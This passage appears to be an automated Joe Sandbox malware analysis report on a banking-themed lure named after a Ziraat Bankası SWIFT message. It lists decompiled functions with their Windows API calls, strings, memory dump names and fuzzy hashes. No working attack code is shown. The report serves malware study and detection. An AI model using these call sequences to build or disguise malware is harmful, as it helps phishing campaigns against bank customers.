Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 000CE396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 000CE40C
GetLastError.KERNEL32 ref: 000CE416
SetErrorMode.KERNEL32(00000000,READY), ref: 000CE483

Strings

READONLY, xrefs: 000CE44E
READY, xrefs: 000CE45C
INVALID, xrefs: 000CE455
NOTREADY, xrefs: 000CE442
UNKNOWN, xrefs: 000CE43B

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 52824978368c02e848225e822dc448e068af6ac1e20e0581b613103129f709c5
Instruction ID: 4e6538ca33f80445fa93fab6ecc2a5c490af8fb7703f8190152b7d48d84edc10
Opcode Fuzzy Hash: 52824978368c02e848225e822dc448e068af6ac1e20e0581b613103129f709c5
Instruction Fuzzy Hash: F8318135A002499FDB15EBA4D845FADB7F4FF04300F14802AF545EB292DB70AA42CB51

Function 000BB907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 000BB98C
GetDlgCtrlID.USER32 ref: 000BB997
GetParent.USER32 ref: 000BB9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 000BB9B6
GetDlgCtrlID.USER32(?), ref: 000BB9BF
GetParent.USER32(?), ref: 000BB9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 000BB9DE

Strings

ListBox, xrefs: 000BB949
ComboBox, xrefs: 000BB911

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 560b6d46eba75a2cbca4ffef807f13e8499b40f5d1c8995e955f120c95cc5b52
Instruction ID: 546d012d7965d3a123ee9c075afde5f08544fa55c92ade9dfff0e9983601fef7
Opcode Fuzzy Hash: 560b6d46eba75a2cbca4ffef807f13e8499b40f5d1c8995e955f120c95cc5b52
Instruction Fuzzy Hash: 6F218374900104BFDB04EBA4DC86EFEBBB5EF49310F10411AF691972E2DBB59959DB20

Function 000BB9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 000BBA73
GetDlgCtrlID.USER32 ref: 000BBA7E
GetParent.USER32 ref: 000BBA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 000BBA9D
GetDlgCtrlID.USER32(?), ref: 000BBAA6
GetParent.USER32(?), ref: 000BBAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 000BBAC5

Strings

ListBox, xrefs: 000BBA32
ComboBox, xrefs: 000BB9FA

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: aa38d6313754e0b7ccf49480f015d10d7fa0aeb6cffe8da0d4e86501bdda17be
Instruction ID: 32a9dff13f26f52ca3ac372e95a447ce60c39d850e3346143207c589dc6cb894
Opcode Fuzzy Hash: aa38d6313754e0b7ccf49480f015d10d7fa0aeb6cffe8da0d4e86501bdda17be
Instruction Fuzzy Hash: 202192B4A40108BFDB01AFA4DC85EFEBBB9FF49300F144016F591A7292EBB559599B20

Function 000BBAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 000BBAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 000BBAF8
_wcscmp.LIBCMT ref: 000BBB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 000BBB85

Strings

largeicons, xrefs: 000BBB19
list, xrefs: 000BBB67
details, xrefs: 000BBB33
SHELLDLL_DefView, xrefs: 000BBB04
smallicons, xrefs: 000BBB4D

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: dd4879feaa0fec3591822f33f27a117ac7fb91568524a5526a57f6b32dd380a9
Instruction ID: 4aefe534d85525eb6f18712813e6087b3f07fb59370c9f4524acfb9d1bb6cc26
Opcode Fuzzy Hash: dd4879feaa0fec3591822f33f27a117ac7fb91568524a5526a57f6b32dd380a9
Instruction Fuzzy Hash: 44110276608307FFFA207670EC06DEA379C9B12760F200022FA08E68DAEFE2A8514514

Function 000DB2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 000DB2D5
CoInitialize.OLE32(00000000), ref: 000DB302
CoUninitialize.OLE32 ref: 000DB30C
GetRunningObjectTable.OLE32(00000000,?), ref: 000DB40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 000DB539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 000DB56D
CoGetObject.OLE32(?,00000000,0010D91C,?), ref: 000DB590
SetErrorMode.KERNEL32(00000000), ref: 000DB5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000DB623
VariantClear.OLEAUT32(0010D91C), ref: 000DB633

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: a9ade5a088ba3b3f76b4cd9bea1553a0e533f33bddd1f553a5ae0332f5f0f485
Instruction ID: 61eb88e897ef5fa88de23e81e6a573a754650e991ba64b9cf5cb2c19e218a3d4
Opcode Fuzzy Hash: a9ade5a088ba3b3f76b4cd9bea1553a0e533f33bddd1f553a5ae0332f5f0f485
Instruction Fuzzy Hash: 07C11371608301EFC700EF68D884A6AB7E9BF89348F05491EF58A9B351DB71ED45CB62

Function 000AACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 000AACC1

Part of subcall function 000A7CF4: __mtinitlocknum.LIBCMT ref: 000A7D06
Part of subcall function 000A7CF4: EnterCriticalSection.KERNEL32(00000000,?,000A7ADD,0000000D), ref: 000A7D1F

__calloc_crt.LIBCMT ref: 000AACD2

Part of subcall function 000A6986: __calloc_impl.LIBCMT ref: 000A6995
Part of subcall function 000A6986: Sleep.KERNEL32(00000000,000003BC,0009F507,?,0000000E), ref: 000A69AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 000AACED
GetStartupInfoW.KERNEL32(?,00136E28,00000064,000A5E91,00136C70,00000014), ref: 000AAD46
__calloc_crt.LIBCMT ref: 000AAD91
GetFileType.KERNEL32(00000001), ref: 000AADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 000AAE11

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: 5e5900eab70deaf5faeb3b086966db4b2eb34ae09c3195e348c30e16145b02c8
Instruction ID: afa9305bed42f1f689c78ce678fa4050e793090d18dc363a1447d3cf631ff0ff
Opcode Fuzzy Hash: 5e5900eab70deaf5faeb3b086966db4b2eb34ae09c3195e348c30e16145b02c8
Instruction Fuzzy Hash: B781B671A053458FDB24CFE8D8405ADBBF0AF0B324B24426DE4A6AB7D2D7359843CB56

Function 000C67E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 000C67FD
__swprintf.LIBCMT ref: 000C680A

Part of subcall function 000A172B: __woutput_l.LIBCMT ref: 000A1784

FindResourceW.KERNEL32(?,?,0000000E), ref: 000C6834
LoadResource.KERNEL32(?,00000000), ref: 000C6840
LockResource.KERNEL32(00000000), ref: 000C684D
FindResourceW.KERNEL32(?,?,00000003), ref: 000C686D
LoadResource.KERNEL32(?,00000000), ref: 000C687F
SizeofResource.KERNEL32(?,00000000), ref: 000C688E
LockResource.KERNEL32(?), ref: 000C689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 000C68F9

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 06a22cd696b92367487711a870ec7389838c67dd7712251272c7221e889ac111
Instruction ID: 6c66eae6a208cf2d0baac7a7f0fc2af6ee48aa623cfe0e0a3457a2089f767107
Opcode Fuzzy Hash: 06a22cd696b92367487711a870ec7389838c67dd7712251272c7221e889ac111
Instruction Fuzzy Hash: D831927590021ABBDB219FA0ED55EBF7BA8FF08340F004529F941D2150EB75D995DB70

Function 000C4025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000C4047
GetForegroundWindow.USER32(00000000,?,?,?,?,?,000C30A5,?,00000001), ref: 000C405B
GetWindowThreadProcessId.USER32(00000000), ref: 000C4062
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000C30A5,?,00000001), ref: 000C4071
GetWindowThreadProcessId.USER32(?,00000000), ref: 000C4083
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,000C30A5,?,00000001), ref: 000C409C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000C30A5,?,00000001), ref: 000C40AE
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,000C30A5,?,00000001), ref: 000C40F3
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,000C30A5,?,00000001), ref: 000C4108
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,000C30A5,?,00000001), ref: 000C4113

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 6ecde5f13e1c1f9429887990aa5de7d542f19f76cd9a9f01367ca954b880a5ae
Instruction ID: c5689759dcf3b3a3f1a8cb1355bc716816874ac56d439e6efdc2c5985977f053
Opcode Fuzzy Hash: 6ecde5f13e1c1f9429887990aa5de7d542f19f76cd9a9f01367ca954b880a5ae
Instruction Fuzzy Hash: 43319175500204AFDB20DF54EC96F6D77EAFB55321F14800AFE54E66A0CBB599C08B60

Function 000BCB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,000BCF50), ref: 000BCE90

Strings

NAME, xrefs: 000BCCC2
INSTANCE, xrefs: 000BCD9E
CLASSNN, xrefs: 000BCC33
REGEXPCLASS, xrefs: 000BCC56
CLASS, xrefs: 000BCC10
TEXT, xrefs: 000BCDC7

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: c0f5289a8b607413149181bf65dcaddeee5bd646e810a8da01ad32147e2b4159
Instruction ID: 779e8103dbe21d2ffb348b3cc7d2f7c0c4ecf7f855abaf2fe9f1ffb192cefbdc
Opcode Fuzzy Hash: c0f5289a8b607413149181bf65dcaddeee5bd646e810a8da01ad32147e2b4159
Instruction Fuzzy Hash: 17917370600546DBDB58EF60C482FEEFBB5BF04300F548529D569A7252DF30A95ADBE0

Function 00083093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000830DC
CoUninitialize.OLE32(?,00000000), ref: 00083181
UnregisterHotKey.USER32(?), ref: 000832A9
DestroyWindow.USER32(?), ref: 000F5079
FreeLibrary.KERNEL32(?), ref: 000F50F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 000F5125

Strings

close all, xrefs: 000830D7

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 2674766e35a2382414bdc43f42933a98b7ee9e7cbafd0bfa438c2faf534a1918
Instruction ID: 49efff68f120862b97d8b453c8d8667b03551abd5d7ee41872881af346f9bb9d
Opcode Fuzzy Hash: 2674766e35a2382414bdc43f42933a98b7ee9e7cbafd0bfa438c2faf534a1918
Instruction Fuzzy Hash: CB913A302006068FC715EF24C899FA9F3B4BF44705F5582A9E68AA7662DF30AE56DF50

Function 0009CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 0009CC15

Part of subcall function 0009CCCD: GetClientRect.USER32(?,?), ref: 0009CCF6
Part of subcall function 0009CCCD: GetWindowRect.USER32(?,?), ref: 0009CD37
Part of subcall function 0009CCCD: ScreenToClient.USER32(?,000000FF), ref: 0009CD5F

GetDC.USER32 ref: 000FD137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 000FD14A
SelectObject.GDI32(00000000,00000000), ref: 000FD158
SelectObject.GDI32(00000000,00000000), ref: 000FD16D
ReleaseDC.USER32(?,00000000), ref: 000FD175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000FD200

Strings

U, xrefs: 000FD0D5

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: ab8babf9ce10ec75b628591f84b23524965223ae4e1ce677cdf12dc156adcb6c
Instruction ID: 2cca2e719b72cc09812f3afbccef5955069aa8bb69e9fff44c111eeb2db2ccbe
Opcode Fuzzy Hash: ab8babf9ce10ec75b628591f84b23524965223ae4e1ce677cdf12dc156adcb6c
Instruction Fuzzy Hash: 5071BF74800209EFDF619F64C885EFE7BB6FF49310F18426AEE555A6A6C7318881EF50

Function 000EECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F

Part of subcall function 0009B63C: GetCursorPos.USER32(000000FF), ref: 0009B64F
Part of subcall function 0009B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0009B66C
Part of subcall function 0009B63C: GetAsyncKeyState.USER32(00000001), ref: 0009B691
Part of subcall function 0009B63C: GetAsyncKeyState.USER32(00000002), ref: 0009B69F

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 000EED3C
ImageList_EndDrag.COMCTL32 ref: 000EED42
ReleaseCapture.USER32 ref: 000EED48
SetWindowTextW.USER32(?,00000000), ref: 000EEDF0
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 000EEE03
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 000EEEDC

Strings

@GUI_DRAGFILE, xrefs: 000EEE77
@GUI_DROPID, xrefs: 000EEE33

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 88b1b7ae01b9ff6b2e1553f2758348745c2575eaebad4662a111421cbda5dd6d
Instruction ID: 4ac6c4253c771232d299a1f47e94b072308dccb9c9c1013cb6ae29c67853927a
Opcode Fuzzy Hash: 88b1b7ae01b9ff6b2e1553f2758348745c2575eaebad4662a111421cbda5dd6d
Instruction Fuzzy Hash: AE519974204344AFD710EF20DC86FAA77E5FB88314F14492DF995A72E2DBB0A984CB52

Function 000D45C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000D45FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 000D462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 000D466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 000D4682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 000D46BF
InternetCloseHandle.WININET(00000000), ref: 000D4706

Part of subcall function 000D5052: GetLastError.KERNEL32(?,?,000D43CC,00000000,00000000,00000001), ref: 000D5067

Strings

, xrefs: 000D46B8

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: 83f77d9629020f8e39f654b66012b1b9df9dc4a7ea63680242e740cbc185cf28
Instruction ID: c4d3eba28e20042d0c79c98c1b9379796ffb35976e80c465ad8656c9c9266248
Opcode Fuzzy Hash: 83f77d9629020f8e39f654b66012b1b9df9dc4a7ea63680242e740cbc185cf28
Instruction Fuzzy Hash: 11414CB1501705BFEB129F90DC89FEA7BACFF09354F004126FA469A281D7B0D9448BB5

Function 000EB33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 000EB3F4

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 3fd43cfd2ec402a919706e1df4381ee399b213161d81bf942f67d7ddf85e8270
Instruction ID: a81318e75d2cca17abf24cd0a5a67709eb9637770cf8ecf48e7d093d85ad1e45
Opcode Fuzzy Hash: 3fd43cfd2ec402a919706e1df4381ee399b213161d81bf942f67d7ddf85e8270
Instruction Fuzzy Hash: 5451C571601284BFEF309F6ADC86BAF7BA4EB05364F244012F654F65E2C7B1E9809B50

Function 0009A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 000FDB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000FDB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000FDB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 000FDB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000FDB95
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0009A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 000FDBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 000FDBBD
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0009A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 000FDBC8

Memory Dump Source

Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
